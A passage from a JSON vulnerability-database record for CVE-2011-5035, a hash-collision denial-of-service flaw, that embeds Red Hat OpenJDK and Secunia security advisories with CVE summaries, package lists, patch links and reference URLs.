(CVE-2012-0502)\n\nIt was discovered that the CORBA (Common Object Request Broker\nArchitecture) implementation in Java did not properly protect repository\nidentifiers on certain CORBA objects. This could have been used to modify\nimmutable object data. (CVE-2012-0506)\n\nAn off-by-one flaw, causing a stack overflow, was found in the unpacker for\nZIP files. A specially-crafted ZIP archive could cause the Java Virtual\nMachine (JVM) to crash when opened. (CVE-2012-0501)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.6. Refer to\nthe NEWS file, linked to in the References, for further information. \n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n788606 - CVE-2011-5035 OpenJDK: HttpServer no header count limit (Lightweight HTTP Server, 7126960)\n788624 - CVE-2012-0501 OpenJDK: off-by-one bug in ZIP reading code (JRE, 7118283)\n788976 - CVE-2012-0503 OpenJDK: unrestricted use of TimeZone.setDefault() (i18n, 7110687)\n788994 - CVE-2011-3571 OpenJDK: AtomicReferenceArray insufficient array type check (Concurrency, 7082299)\n789295 - CVE-2011-3563 OpenJDK: JavaSound incorrect bounds check (Sound, 7088367)\n789297 - CVE-2012-0502 OpenJDK: KeyboardFocusManager focus stealing (AWT, 7110683)\n789299 - CVE-2012-0505 OpenJDK: incomplete info in the deserialization exception (Serialization, 7110700)\n789300 - CVE-2012-0506 OpenJDK: mutable repository identifiers (CORBA, 7110704)\n789301 - CVE-2012-0497 OpenJDK: insufficient checking of the graphics rendering object (2D, 7112642)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\ni386:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm\n\ni386:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm\n\nx86_64:\njava-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\njava-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-3563.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3571.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-5035.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0497.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0501.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0502.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0503.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0505.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0506.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttp://icedtea.classpath.org/hg/release/icedtea6-1.10/file/icedtea6-1.10.6/NEWS\nhttp://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFPOwEiXlSAg2UNWIIRAnYKAKCorWMpTAsiiuJ4uSywvmAym2EK0wCfa/8B\nlhqpUTdPMNmgswBpMj4pV/M=\n=9liL\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ----------------------------------------------------------------------\n\nSecunia is hiring!\n\nFind your next job here:\n\nhttp://secunia.com/company/jobs/\n\n----------------------------------------------------------------------\n\nTITLE:\nOracle Multiple Products Web Form Hash Collision Denial of Service\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA47819\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/47819/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47819\n\nRELEASE DATE:\n2012-02-01\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/47819/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/47819/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47819\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in multiple Oracle products, which\ncan be exploited by malicious people to cause a DoS (Denial of\nService). \n\nThe vulnerability is caused due to an error within a hash generation\nfunction when hashing form posts and updating a hash table. \n\nThe vulnerability is reported in the following products:\n* Oracle Application Server 10g Release 3 version 10.1.3.5.0. \n* Oracle iPlanet Web Server 7.0. \n* Oracle iPlanet Web Server (formerly Oracle Java System Web Server)\n6.1. \n\nSOLUTION:\nApply patch. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2011-5035-1506603.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch page, listed in the References section",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-5035"
},
{
"db": "CERT/CC",
"id": "VU#903934"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
},
{
"db": "BID",
"id": "51194"
},
{
"db": "VULMON",
"id": "CVE-2011-5035"
},
{
"db": "PACKETSTORM",
"id": "111624"
},
{
"db": "PACKETSTORM",
"id": "125556"
},
{
"db": "PACKETSTORM",
"id": "112144"
},
{
"db": "PACKETSTORM",
"id": "110365"
},
{
"db": "PACKETSTORM",
"id": "109793"
},
{
"db": "PACKETSTORM",
"id": "109353"
},
{
"db": "PACKETSTORM",
"id": "109834"
},
{
"db": "PACKETSTORM",
"id": "110035"
}
],
"trust": 3.42
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=2012",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2011-5035"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2011-5035",
"trust": 3.0
},
{
"db": "CERT/CC",
"id": "VU#903934",
"trust": 2.7
},
{
"db": "OCERT",
"id": "OCERT-2011-003",
"trust": 2.2
},
{
"db": "SECUNIA",
"id": "48589",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57126",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "48073",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "48074",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "48950",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567",
"trust": 0.8
},
{
"db": "BID",
"id": "51194",
"trust": 0.4
},
{
"db": "HITACHI",
"id": "HS12-007",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "47819",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "2012",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2011-5035",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "111624",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "125556",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112144",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110365",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109793",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109353",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "109834",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110035",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#903934"
},
{
"db": "VULMON",
"id": "CVE-2011-5035"
},
{
"db": "BID",
"id": "51194"
},
{
"db": "PACKETSTORM",
"id": "111624"
},
{
"db": "PACKETSTORM",
"id": "125556"
},
{
"db": "PACKETSTORM",
"id": "112144"
},
{
"db": "PACKETSTORM",
"id": "110365"
},
{
"db": "PACKETSTORM",
"id": "109793"
},
{
"db": "PACKETSTORM",
"id": "109353"
},
{
"db": "PACKETSTORM",
"id": "109834"
},
{
"db": "PACKETSTORM",
"id": "110035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
},
{
"db": "NVD",
"id": "CVE-2011-5035"
}
]
},
"id": "VAR-201112-0123",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26205936
},
"last_update_date": "2026-03-09T22:56:36.051000Z",
"patch": {
"_id": null,
"data": [
{
"title": "HT5228",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT5228"
},
{
"title": "HT1338",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT1338?viewlocale=ja_JP"
},
{
"title": "HT5228",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT5228?viewlocale=ja_JP"
},
{
"title": "HS12-007",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-007/index.html"
},
{
"title": "HPSBST02955 SSRT101157",
"trust": 0.8,
"url": "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en\u0026cc=us\u0026objectID=c04047415"
},
{
"title": "Text Form of Oracle Critical Patch Update - January 2013 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2013verbose-1897756.html"
},
{
"title": "Oracle Critical Patch Update Advisory - April 2012",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html"
},
{
"title": "Oracle Critical Patch Update Advisory - January 2012",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html"
},
{
"title": "Oracle Critical Patch Update Advisory - January 2013",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html"
},
{
"title": "Oracle Security Alert for CVE-2011-5035",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2011-5035-1506603.html"
},
{
"title": "RHSA-2013:1455",
"trust": 0.8,
"url": "http://rhn.redhat.com/errata/RHSA-2013-1455.html"
},
{
"title": "January 2012 Critical Patch Update Released",
"trust": 0.8,
"url": "http://blogs.oracle.com/security/entry/january_2012_critical_patch_update"
},
{
"title": "January 2013 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/january_2013_critical_patch_update"
},
{
"title": "interstage_as_201201",
"trust": 0.8,
"url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_as_201201.html"
},
{
"title": "HS12-007",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-007/index.html"
},
{
"title": "Red Hat: Important: java-1.6.0-openjdk security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120322 - Security Advisory"
},
{
"title": "Red Hat: Critical: java-1.6.0-openjdk security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120135 - Security Advisory"
},
{
"title": "Red Hat: Critical: java-1.6.0-sun security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120139 - Security Advisory"
},
{
"title": "Red Hat: Critical: java-1.6.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20120514 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: openjdk-6b18 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1373-2"
},
{
"title": "Ubuntu Security Notice: openjdk-6 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1373-1"
},
{
"title": "Amazon Linux AMI: ALAS-2012-043",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2012-043"
},
{
"title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20131455 - Security Advisory"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/oracle-patches-88-vulnerabilities-including-some-allow-remote-exploits-without-authentication/76457/"
},
{
"title": "welivesecurity",
"trust": 0.1,
"url": "https://www.welivesecurity.com/2012/04/05/mac-flashback-trojan-java-update/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2011-5035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003567"
},
{
"db": "NVD",
"id": "CVE-2011-5035"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.2,
"url": "http://www.ocert.org/advisories/ocert-2011-003.html"
},
{
"trust": 2.2,
"url": "http://www.nruns.com/_downloads/advisory28122011.pdf"
},
{
"trust": 1.9,
"url": "http://www.kb.cert.org/vuls/id/903934"
},
{
"trust": 1.4,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html"
},
{
"trust": 1.4,
"url": "http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2012-0514.html"
},
{
"trust": 1.1,
"url": "https://github.com/firefart/hashcollision-dos-poc/blob/master/hashtablepoc.py"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/48589"
},
{
"trust": 1.1,
"url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/48950"
},
{
"trust": 1.1,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:150"
},
{
"trust": 1.1,
"url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html"
},
{
"trust": 1.1,
"url": "http://www.debian.org/security/2012/dsa-2420"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=139344343412337\u0026w=2"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/57126"
},
{
"trust": 1.1,
"url": "http://security.gentoo.org/glsa/glsa-201406-32.xml"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=134254957702612\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=133364885411663\u0026w=2"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=133847939902305\u0026w=2"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a16908"
},
{
"trust": 1.1,
"url": "http://marc.info/?l=bugtraq\u0026m=134254866602253\u0026w=2"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00010.html"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/48073"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/48074"
},
{
"trust": 0.8,
"url": "http://www.cs.rice.edu/~scrosby/hash/crosbywallach_usenixsec2003.pdf"
},
{
"trust": 0.8,
"url": "http://technet.microsoft.com/en-us/security/bulletin/ms11-100.mspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx"
},
{
"trust": 0.8,
"url": "http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/391606"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-5035"
},
{
"trust": 0.8,
"url": "http://www.ipa.go.jp/security/ciadr/vul/20120106-web.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu903934"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu514315/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-5035"
},
{
"trust": 0.7,
"url": "http://www.ibm.com/developerworks/java/jdk/alerts/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-5035"
},
{
"trust": 0.6,
"url": "http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0505"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0501"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0503"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3563"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0506"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0502"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0497"
},
{
"trust": 0.4,
"url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2011-5035-1506603.html"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0503.html"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0502.html"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2011-3563.html"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2011-5035.html"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0505.html"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0506.html"
},
{
"trust": 0.4,
"url": "http://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0501.html"
},
{
"trust": 0.3,
"url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03350339"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/us/products/middleware/application-server/oracle-glassfish-server/index.html"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1pm59971"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1pm59978"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100159245"
},
{
"trust": 0.3,
"url": "http://downloads.avaya.com/css/p8/documents/100160575"
},
{
"trust": 0.3,
"url": "https://downloads.avaya.com/css/p8/documents/100160941"
},
{
"trust": 0.3,
"url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03254184\u0026ac.admitted=1332960372864.876444892.199480143"
},
{
"trust": 0.3,
"url": "http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03254184\u0026ac.admitted=1333452463922.876444892.492883150"
},
{
"trust": 0.3,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-007/index.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0507"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0499"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0500"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-0498"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0497.html"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/kb/docs/doc-11259"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/security/data/cve/cve-2011-3571.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3571"
},
{
"trust": 0.2,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0498.html"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0500.html"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/security/data/cve/cve-2012-0499.html"
},
{
"trust": 0.2,
"url": "http://icedtea.classpath.org/hg/release/icedtea6-1.10/file/icedtea6-1.10.6/news"
},
{
"trust": 0.1,
